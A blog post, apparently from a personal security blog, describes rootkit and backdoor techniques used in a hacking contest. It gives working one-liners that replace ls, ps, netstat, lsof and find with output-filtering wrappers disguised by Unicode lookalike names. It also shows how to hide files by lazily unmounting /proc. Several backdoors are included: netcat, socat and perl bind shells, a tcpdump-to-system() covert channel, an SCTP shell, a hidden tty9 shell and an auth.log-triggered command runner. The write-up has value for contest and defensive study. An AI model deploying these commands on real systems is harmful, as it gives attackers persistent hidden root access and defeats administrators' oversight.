<!DOCTYPE html>
<!--[if IE 6]>
<html id="ie6" lang="en-US">
<![endif]-->
<!--[if IE 7]>
<html id="ie7" lang="en-US">
<![endif]-->
<!--[if IE 8]>
<html id="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 6) & !(IE 7) & !(IE 8)]><!-->
<html lang="en-US">
<!--<![endif]-->
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width" />
<title>
[Hacking-Contest] Rootkit | Jakob Lell&#039;s Blog	</title>
<link rel="profile" href="https://gmpg.org/xfn/11" />
<link rel="stylesheet" type="text/css" media="all" href="https://www.jakoblell.com/blog/wp-content/themes/twentyeleven/style.css?ver=20190507" />
<link rel="pingback" href="https://www.jakoblell.com/blog/xmlrpc.php">
<!--[if lt IE 9]>
<script src="https://www.jakoblell.com/blog/wp-content/themes/twentyeleven/js/html5.js?ver=3.7.0" type="text/javascript"></script>
<![endif]-->
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Jakob Lell&#039;s Blog &raquo; Feed" href="https://www.jakoblell.com/blog/feed/" />
<link rel="alternate" type="application/rss+xml" title="Jakob Lell&#039;s Blog &raquo; Comments Feed" href="https://www.jakoblell.com/blog/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Jakob Lell&#039;s Blog &raquo; [Hacking-Contest] Rootkit Comments Feed" href="https://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.jakoblell.com\/blog\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.8.6"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://www.jakoblell.com/blog/wp-includes/css/dist/block-library/style.min.css?ver=5.8.6' type='text/css' media='all' />
<style id='wp-block-library-theme-inline-css' type='text/css'>
#start-resizable-editor-section{display:none}.wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-code{font-family:Menlo,Consolas,monaco,monospace;color:#1e1e1e;padding:.8em 1em;border:1px solid #ddd;border-radius:4px}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-pullquote{border-top:4px solid;border-bottom:4px solid;margin-bottom:1.75em;color:currentColor}.wp-block-pullquote__citation,.wp-block-pullquote cite,.wp-block-pullquote footer{color:currentColor;text-transform:uppercase;font-size:.8125em;font-style:normal}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;position:relative;font-style:normal}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-group.has-background{padding:1.25em 2.375em;margin-top:0;margin-bottom:0}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto;opacity:.4}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{padding:.5em;border:1px solid;word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-template-part.has-background{padding:1.25em 2.375em;margin-top:0;margin-bottom:0}#end-resizable-editor-section{display:none}
</style>
<link rel='stylesheet' id='wp-syntax-css-css'  href='https://www.jakoblell.com/blog/wp-content/plugins/wp-syntax/css/wp-syntax.css?ver=1.1' type='text/css' media='all' />
<link rel='stylesheet' id='twentyeleven-block-style-css'  href='https://www.jakoblell.com/blog/wp-content/themes/twentyeleven/blocks.css?ver=20190102' type='text/css' media='all' />
<script type='text/javascript' src='https://www.jakoblell.com/blog/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>
<script type='text/javascript' src='https://www.jakoblell.com/blog/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<link rel="https://api.w.org/" href="https://www.jakoblell.com/blog/wp-json/" /><link rel="alternate" type="application/json" href="https://www.jakoblell.com/blog/wp-json/wp/v2/posts/136" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.jakoblell.com/blog/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.jakoblell.com/blog/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.8.6" />
<link rel="canonical" href="https://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/" />
<link rel='shortlink' href='https://www.jakoblell.com/blog/?p=136' />
<link rel="alternate" type="application/json+oembed" href="https://www.jakoblell.com/blog/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.jakoblell.com%2Fblog%2F2014%2F05%2F07%2Fhacking-contest-rootkit%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.jakoblell.com/blog/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.jakoblell.com%2Fblog%2F2014%2F05%2F07%2Fhacking-contest-rootkit%2F&#038;format=xml" />
<link type="text/css" rel="stylesheet" href="https://www.jakoblell.com/blog/wp-content/plugins/category-rss-widget-menu/wp_cat_rss_style.css" />
	<style>
		/* Link color */
		a,
		#site-title a:focus,
		#site-title a:hover,
		#site-title a:active,
		.entry-title a:hover,
		.entry-title a:focus,
		.entry-title a:active,
		.widget_twentyeleven_ephemera .comments-link a:hover,
		section.recent-posts .other-recent-posts a[rel="bookmark"]:hover,
		section.recent-posts .other-recent-posts .comments-link a:hover,
		.format-image footer.entry-meta a:hover,
		#site-generator a:hover {
			color: #e4741f;
		}
		section.recent-posts .other-recent-posts .comments-link a:hover {
			border-color: #e4741f;
		}
		article.feature-image.small .entry-summary p a:hover,
		.entry-header .comments-link a:hover,
		.entry-header .comments-link a:focus,
		.entry-header .comments-link a:active,
		.feature-slider a.active {
			background-color: #e4741f;
		}
	</style>
	<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style><style type="text/css" id="custom-background-css">
body.custom-background { background-color: #f1f1f1; }
</style>
	<link type="text/css" rel="stylesheet" href="https://www.jakoblell.com/blog/wp-content/plugins/wp-syntax-download-extension/wp-syntax-download-extension.css" /></head>

<body class="post-template-default single single-post postid-136 single-format-standard custom-background wp-embed-responsive single-author singular two-column right-sidebar">
<div class="skip-link"><a class="assistive-text" href="#content">Skip to primary content</a></div><div id="page" class="hfeed">
	<header id="branding" role="banner">
			<hgroup>
				<h1 id="site-title"><span><a href="https://www.jakoblell.com/blog/" rel="home">Jakob Lell&#039;s Blog</a></span></h1>
				<h2 id="site-description">technology changes &#8211; insecurity remains</h2>
			</hgroup>

			
									<form method="get" id="searchform" action="https://www.jakoblell.com/blog/">
		<label for="s" class="assistive-text">Search</label>
		<input type="text" class="field" name="s" id="s" placeholder="Search" />
		<input type="submit" class="submit" name="submit" id="searchsubmit" value="Search" />
	</form>
			
			<nav id="access" role="navigation">
				<h3 class="assistive-text">Main menu</h3>
				<div class="menu"><ul>
<li ><a href="https://www.jakoblell.com/blog/">Home</a></li><li class="page_item page-item-6"><a href="https://www.jakoblell.com/blog/contact/">Contact</a></li>
</ul></div>
			</nav><!-- #access -->
	</header><!-- #branding -->


	<div id="main">

		<div id="primary">
			<div id="content" role="main">

				
					<nav id="nav-single">
						<h3 class="assistive-text">Post navigation</h3>
						<span class="nav-previous"><a href="https://www.jakoblell.com/blog/2014/05/07/hacking-contest-backdooring-rsyslogd/" rel="prev"><span class="meta-nav">&larr;</span> Previous</a></span>
						<span class="nav-next"><a href="https://www.jakoblell.com/blog/2014/05/07/hacking-contest-binary-planting/" rel="next">Next <span class="meta-nav">&rarr;</span></a></span>
					</nav><!-- #nav-single -->

					
<article id="post-136" class="post-136 post type-post status-publish format-standard hentry category-security">
	<header class="entry-header">
		<h1 class="entry-title">[Hacking-Contest] Rootkit</h1>

				<div class="entry-meta">
			<span class="sep">Posted on </span><a href="https://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/" title="08:11" rel="bookmark"><time class="entry-date" datetime="2014-05-07T08:11:06+01:00">May 7, 2014</time></a><span class="by-author"> <span class="sep"> by </span> <span class="author vcard"><a class="url fn n" href="https://www.jakoblell.com/blog/author/jakob/" title="View all posts by Jakob" rel="author">Jakob</a></span></span>		</div><!-- .entry-meta -->
			</header><!-- .entry-header -->

	<div class="entry-content">
		<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<?xml encoding="UTF-8"><html><body><p><div class="toc"><div class="toc_list"><ul><li class="toc_item"><a href="#toc-0"> Basic operation of rootkit</a></li><li class="toc_item"><a href="#toc-1"> Shell script version of rootkit</a></li><li class="toc_item"><a href="#toc-2"> C version of rootkit</a></li><li class="toc_item"><a href="#toc-3"> Using the rootkit to hide stuff</a></li><li class="toc_item"><a href="#toc-4"> File hiding below the proc filesystem</a></li><li class="toc_item"><a href="#toc-5"> Netcat remote shell</a></li><li class="toc_item"><a href="#toc-6"> Using tcpdump as a covert communication path</a></li><li class="toc_item"><a href="#toc-7"> SCTP remote shell</a></li><li class="toc_item"><a href="#toc-8"> Hidden shell on /dev/tty9</a></li><li class="toc_item"><a href="#toc-9"> Covert communication path with sshd and /var/log/auth.log</a></li></ul></div></div></p>
<a name="toc-0" style="text-decoration: none;"></a><h2> Basic operation of rootkit</h2>
<p>This blogpost shows how to install a simple rootkit with one single (but relatively long) line on a terminal. While the rootkit is not as capable and hard to detect as a full kernel rootkit, it is still able to hide itself, other files, running processes and even open TCP/UDP ports from the system administrator. We have used variations of this rootkit in the hacking contest for several years and it has never been detected and removed in phase 2.</p>
<p>The rootkit works by replacing the commands ls, netstat, ps, lsof and find with a simple wrapper, which calls the original command with all arguments and pipes the output to "grep -vE 'regex_of_stuff_to_hide'" to filter out lines of the output. There are two variations of the rootkit. The first one uses a simple shell script for the wrapper while the second one compiles a small c program instead (which makes the rootkit harder to detect and analyze in the limited time of the hacking contest).</p>
<a name="toc-1" style="text-decoration: none;"></a><h2> Shell script version of rootkit</h2>
<p>The shell script version is still useful if the system doesn't contain a c compiler:</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">which</span> <span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #c20cb9; font-weight: bold;">netstat</span> <span style="color: #c20cb9; font-weight: bold;">ps</span> lsof <span style="color: #c20cb9; font-weight: bold;">find</span><span style="color: #000000; font-weight: bold;">|</span><span style="color: #c20cb9; font-weight: bold;">perl</span> <span style="color: #660033;">-pe</span><span style="color: #ff0000;">'$s=&quot;\x{455}&quot;;$n=&quot;\x{578}&quot;;chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,&quot;&amp;gt;$o&quot;;print F&quot;#!/bin/sh\n$_ \$*|grep -vE \&quot;[$s-$n]|grep|177\&quot;&quot;;chmod 493,$o'</span></pre></td></tr></table><p class="theCode" style="display:none;">which ls netstat ps lsof find|perl -pe'$s=&quot;\x{455}&quot;;$n=&quot;\x{578}&quot;;chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,&quot;&amp;gt;$o&quot;;print F&quot;#!/bin/sh\n$_ \$*|grep -vE \&quot;[$s-$n]|grep|177\&quot;&quot;;chmod 493,$o'</p></div>

<p>The which command lists the absolute path of the programs to maniuplate in the rootkit. These absolute paths are passed to a perl one-liner. The perl program starts with defining the variables $s and $n, which are initialized with the Unicode characters u+455 and u+578. These characters look like the ascii characters "s" and "n". Then it copies the filename of the original filename to $o and changes the filename in $_ by replacing the "s" in ls, netstat, ps and lsof with u+455 and the "n" in find with u+578. The result of these replacements is a new filename which looks exactly like the original filename. The original program is then renamed to the new name and then replaced with a shell script, which calls the renamed original program ($_) and pipes the output to grep. The grep command filters lines containing one of the following:</p>
<ul><li> Unicode characters used by the rootkit ([$s-$n]) =&gt; Makes the rootkit self-hiding</li>
<li> The string "grep" =&gt; Don't show that grep is running in the output of ps</li>
<li> The string "177" =&gt; This is used for the stuff which should be hidden by the rootkit.</li>
</ul><p>This rootkit is pretty easy to detect and analyze because it can easily be seen with the file command that programs like ps or ls have changed the type from an ELF binary to a shell script. After discovering the rootkit, it is also pretty easy to analyze the functionality of it and then selectively find the backdoors hidden by the rootkit.</p>
<a name="toc-2" style="text-decoration: none;"></a><h2> C version of rootkit</h2>
<p>In order to make finding and analyzing the rootkit more difficult, it is also possible to compile small binaries instead of the shell script:</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">which</span> <span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #c20cb9; font-weight: bold;">netstat</span> <span style="color: #c20cb9; font-weight: bold;">ps</span> lsof <span style="color: #c20cb9; font-weight: bold;">find</span><span style="color: #000000; font-weight: bold;">|</span><span style="color: #c20cb9; font-weight: bold;">perl</span> <span style="color: #660033;">-pe</span><span style="color: #ff0000;">'$s=&quot;\x{455}&quot;;$n=&quot;\x{578}&quot;;chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,&quot;|gcc -xc - -o$o&quot;;print F qq{int main(int a,char**b){char*c[999999]={&quot;sh&quot;,&quot;-c&quot;,&quot;$_ \$*|grep -vE \\&quot;177|\$\$|[$s-$n]|grep\\&quot;&quot;};memcpy(c+3,b,8*a);execv(&quot;/bin/sh&quot;,c);}}'</span></pre></td></tr></table><p class="theCode" style="display:none;">which ls netstat ps lsof find|perl -pe'$s=&quot;\x{455}&quot;;$n=&quot;\x{578}&quot;;chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,&quot;|gcc -xc - -o$o&quot;;print F qq{int main(int a,char**b){char*c[999999]={&quot;sh&quot;,&quot;-c&quot;,&quot;$_ \$*|grep -vE \\&quot;177|\$\$|[$s-$n]|grep\\&quot;&quot;};memcpy(c+3,b,8*a);execv(&quot;/bin/sh&quot;,c);}}'</p></div>

<p>The beginning is pretty much like the first variant of the rootkit. However, insted of directly writing the wrapper program, the perl script opens a pipe to gcc and writes a small C program to this pipe. The following shows a more readable version of the C program:</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="c" style="font-family:monospace;"><span style="color: #993333;">int</span> main<span style="color: #009900;">&#40;</span><span style="color: #993333;">int</span> a<span style="color: #339933;">,</span><span style="color: #993333;">char</span><span style="color: #339933;">**</span>b<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
  <span style="color: #993333;">char</span><span style="color: #339933;">*</span>c<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">999999</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">=</span><span style="color: #009900;">&#123;</span><span style="color: #ff0000;">&quot;sh&quot;</span><span style="color: #339933;">,</span><span style="color: #ff0000;">&quot;-c&quot;</span><span style="color: #339933;">,</span><span style="color: #ff0000;">&quot;original_program \$*|grep -vE <span style="color: #000099; font-weight: bold;">\\</span>&quot;</span><span style="color: #0000dd;">177</span><span style="color: #339933;">|</span>\$\$<span style="color: #339933;">|</span><span style="color: #009900;">&#91;</span>$s<span style="color: #339933;">-</span>$n<span style="color: #009900;">&#93;</span><span style="color: #339933;">|</span>grep\\<span style="color: #ff0000;">&quot;&quot;</span><span style="color: #009900;">&#125;</span><span style="color: #339933;">;</span>
  <span style="color: #000066;">memcpy</span><span style="color: #009900;">&#40;</span>c<span style="color: #339933;">+</span><span style="color: #0000dd;">3</span><span style="color: #339933;">,</span>b<span style="color: #339933;">,</span><span style="color: #0000dd;">8</span><span style="color: #339933;">*</span>a<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
  execv<span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;/bin/sh&quot;</span><span style="color: #339933;">,</span>c<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span></pre></td></tr></table><p class="theCode" style="display:none;">int main(int a,char**b){
  char*c[999999]={&quot;sh&quot;,&quot;-c&quot;,&quot;original_program \$*|grep -vE \\&quot;177|\$\$|[$s-$n]|grep\\&quot;&quot;};
  memcpy(c+3,b,8*a);
  execv(&quot;/bin/sh&quot;,c);
}</p></div>

<p>The first line initializes the argument array for execv with "sh -c" and the same shell command as the first variant of the rootkit while the second line copies all remaining arguments from the argv array passed to the wrapper binary to the end of the argument array for execv.</p>
<a name="toc-3" style="text-decoration: none;"></a><h2> Using the rootkit to hide stuff</h2>
<p>The following section shows some of the stuff which can be hidden by the rootkit. In order to hide a process using the rootkit, it must match the regular expression of the grep command. This can easily be achieved by making the process name contain the string "177". For hiding open ports from netstat/lsof, the port number has to contain "177".</p>
<a name="toc-4" style="text-decoration: none;"></a><h2> File hiding below the proc filesystem</h2>
<p>Another interesting dilemma when hiding backdoors is whether you want to leave the backdoor binary in the filesystem or not. If you keep the binaries in the filesystem, the backdoor can be found and detected there. On the other hand, it is relatively uncommon to have open file descriptors to deleted files on a typical desktop Linux system and so a defender can easily spot processes with open file handles to deleted files using e.g. the following command:</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>proc<span style="color: #000000; font-weight: bold;">/*/</span>fd<span style="color: #000000; font-weight: bold;">|</span><span style="color: #c20cb9; font-weight: bold;">grep</span> deleted</pre></td></tr></table><p class="theCode" style="display:none;">ls -l /proc/*/fd|grep deleted</p></div>

<p>In order to come around this limitation, we have found a clever new way of hiding files from the system administrator without deleting the files: Unmounting the /proc directory, place the files in /proc on the root filesystem and remount the proc filesystem. Since there may be processes accessing the proc filesystem while we try to unmount it, we use the -l option of umount for lazy unmounting:</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">umount</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>proc</pre></td></tr></table><p class="theCode" style="display:none;">umount -l /proc</p></div>

<p>Now we can create a few files there for our backdoors:</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #000000; font-weight: bold;">/</span>proc
<span style="color: #c20cb9; font-weight: bold;">cp</span> <span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>bin<span style="color: #000000; font-weight: bold;">/</span><span style="color: #c20cb9; font-weight: bold;">perl</span> 177a
<span style="color: #c20cb9; font-weight: bold;">cp</span> <span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>sbin<span style="color: #000000; font-weight: bold;">/</span>tcpdump 177b
<span style="color: #c20cb9; font-weight: bold;">cp</span> <span style="color: #000000; font-weight: bold;">/</span>bin<span style="color: #000000; font-weight: bold;">/</span>nc.tr<span style="color: #000000; font-weight: bold;">*</span> 177c
<span style="color: #c20cb9; font-weight: bold;">cp</span> <span style="color: #000000; font-weight: bold;">`</span><span style="color: #c20cb9; font-weight: bold;">which</span> socat<span style="color: #000000; font-weight: bold;">`</span> 177d
<span style="color: #c20cb9; font-weight: bold;">mknod</span> 177e c <span style="color: #000000;">4</span> <span style="color: #000000;">9</span> <span style="color: #666666; font-style: italic;"># This is a copy of /dev/tty9</span>
<span style="color: #c20cb9; font-weight: bold;">ln</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>auth.log 177f</pre></td></tr></table><p class="theCode" style="display:none;">cd /proc
cp /usr/bin/perl 177a
cp /usr/sbin/tcpdump 177b
cp /bin/nc.tr* 177c
cp `which socat` 177d
mknod 177e c 4 9 # This is a copy of /dev/tty9
ln /var/log/auth.log 177f</p></div>

<a name="toc-5" style="text-decoration: none;"></a><h2> Netcat remote shell</h2>
<p>The first backdoor is a simple netcat listener with a shell attached (177c is a copy of nc.traditional):</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;">.<span style="color: #000000; font-weight: bold;">/</span>177c <span style="color: #660033;">-l</span> <span style="color: #660033;">-p</span> <span style="color: #000000;">3177</span> <span style="color: #660033;">-e</span> <span style="color: #000000; font-weight: bold;">/</span>bin<span style="color: #000000; font-weight: bold;">/</span><span style="color: #c20cb9; font-weight: bold;">sh</span> <span style="color: #000000; font-weight: bold;">&amp;</span>amp;</pre></td></tr></table><p class="theCode" style="display:none;">./177c -l -p 3177 -e /bin/sh &amp;amp;</p></div>

<p>If there is no compatible netcat available, we can use socat (177d) or perl (177a) instead:</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;">.<span style="color: #000000; font-weight: bold;">/</span>177d TCP4-Listen:<span style="color: #000000;">3177</span>,fork EXEC:<span style="color: #000000; font-weight: bold;">/</span>bin<span style="color: #000000; font-weight: bold;">/</span><span style="color: #c20cb9; font-weight: bold;">sh</span> <span style="color: #000000; font-weight: bold;">&amp;</span>amp;</pre></td></tr></table><p class="theCode" style="display:none;">./177d TCP4-Listen:3177,fork EXEC:/bin/sh &amp;amp;</p></div>

<p>And if socat is missing as well, we can still use perl:</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;">.<span style="color: #000000; font-weight: bold;">/</span>177a <span style="color: #660033;">-MIO</span> <span style="color: #660033;">-e</span><span style="color: #ff0000;">'$s=new IO::Socket::INET(LocalPort=&amp;gt;1337,Listen=&amp;gt;1);while($c=$s-&amp;gt;accept()){$_=&amp;lt;$c&amp;gt;;print $c `$_`;}'</span><span style="color: #000000; font-weight: bold;">&amp;</span>amp;</pre></td></tr></table><p class="theCode" style="display:none;">./177a -MIO -e'$s=new IO::Socket::INET(LocalPort=&amp;gt;1337,Listen=&amp;gt;1);while($c=$s-&amp;gt;accept()){$_=&amp;lt;$c&amp;gt;;print $c `$_`;}'&amp;amp;</p></div>

<p>Due to the rootkit these processes and the open port can't be seen with standard system tools like ps or netstat.</p>
<a name="toc-6" style="text-decoration: none;"></a><h2> Using tcpdump as a covert communication path</h2>
<p>Another backdoor can be built based on tcpdump (which has been copied to 177b):</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;">.<span style="color: #000000; font-weight: bold;">/</span>177b <span style="color: #660033;">-iany</span> <span style="color: #660033;">-n</span> <span style="color: #660033;">-A</span> udp <span style="color: #000000;">2</span><span style="color: #000000; font-weight: bold;">&amp;</span>gt;<span style="color: #000000; font-weight: bold;">&amp;</span>amp;<span style="color: #000000;">1</span><span style="color: #000000; font-weight: bold;">|</span>.<span style="color: #000000; font-weight: bold;">/</span>177a <span style="color: #660033;">-ne</span><span style="color: #ff0000;">'system($1)if/LEGO(.*)/'</span><span style="color: #000000; font-weight: bold;">&amp;</span>amp;</pre></td></tr></table><p class="theCode" style="display:none;">./177b -iany -n -A udp 2&amp;gt;&amp;amp;1|./177a -ne'system($1)if/LEGO(.*)/'&amp;amp;</p></div>

<p>This command makes tcpdump listen for udp packets on any interfaces and due to the -A option it outputs the raw packet data to STDOUT, which is then piped to a small perl one-liner, which checks for a marker (the string "LEGO") and passes everything from there to system(). This backdoor is particularly interesting because it provides remote root access without any open ports (which might still be detected e.g. with a port scan).</p>
<a name="toc-7" style="text-decoration: none;"></a><h2> SCTP remote shell</h2>
<p>The followinig backdoor uses socat (copied to 177d) to open a backdoor via SCTP.</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;">.<span style="color: #000000; font-weight: bold;">/</span>177d SCTP-Listen:<span style="color: #000000;">1177</span>,fork EXEC:<span style="color: #000000; font-weight: bold;">/</span>bin<span style="color: #000000; font-weight: bold;">/</span><span style="color: #c20cb9; font-weight: bold;">bash</span><span style="color: #000000; font-weight: bold;">&amp;</span>amp;</pre></td></tr></table><p class="theCode" style="display:none;">./177d SCTP-Listen:1177,fork EXEC:/bin/bash&amp;amp;</p></div>

<p>Since SCTP is not listed with netstat, it is less likely to be detected than a standard backdoor via TCP/UDP.</p>
<a name="toc-8" style="text-decoration: none;"></a><h2> Hidden shell on /dev/tty9</h2>
<p>The following uses perl (177a) to open a shell to /dev/tty9 (177e), which can be accessed via [CTRL]+[ALT]+[F9].</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;">.<span style="color: #000000; font-weight: bold;">/</span>177a <span style="color: #660033;">-pe</span><span style="color: #ff0000;">'system$_'</span><span style="color: #000000; font-weight: bold;">&amp;</span>lt;177e<span style="color: #000000; font-weight: bold;">&amp;</span>gt;177e<span style="color: #000000; font-weight: bold;">&amp;</span>amp;</pre></td></tr></table><p class="theCode" style="display:none;">./177a -pe'system$_'&amp;lt;177e&amp;gt;177e&amp;amp;</p></div>

<p>Opening a shell on tty devices like this is an old trick and well-prepared teams usually check for that kind of backdoors by switching over all virtual terminals and looking for a shell prompt (due to the perl one-liner instead of a real shell there is no visible shell prompt with our exploit) or by running a command like "lsof -n /dev/tty*" (which won't detect our version of the backdoor since we recreated the device with mknod).</p>
<a name="toc-9" style="text-decoration: none;"></a><h2> Covert communication path with sshd and /var/log/auth.log</h2>
<p>The following perl (177a) one-liner continiously monitors 177f (which is a hard link to /var/log/auth.log) for a magic string ("LEGO") and parses the following characters as hex-encoded string, which is then decoded and passed to system.</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;">.<span style="color: #000000; font-weight: bold;">/</span>177a <span style="color: #660033;">-e</span><span style="color: #ff0000;">'while(1){sleep(1);while(&amp;lt;&amp;gt;){system pack(&quot;H*&quot;,$1)if/LEGO(\w+)/}}'</span><span style="color: #000000; font-weight: bold;">&amp;</span>lt;177f<span style="color: #000000; font-weight: bold;">&amp;</span>amp;</pre></td></tr></table><p class="theCode" style="display:none;">./177a -e'while(1){sleep(1);while(&amp;lt;&amp;gt;){system pack(&quot;H*&quot;,$1)if/LEGO(\w+)/}}'&amp;lt;177f&amp;amp;</p></div>

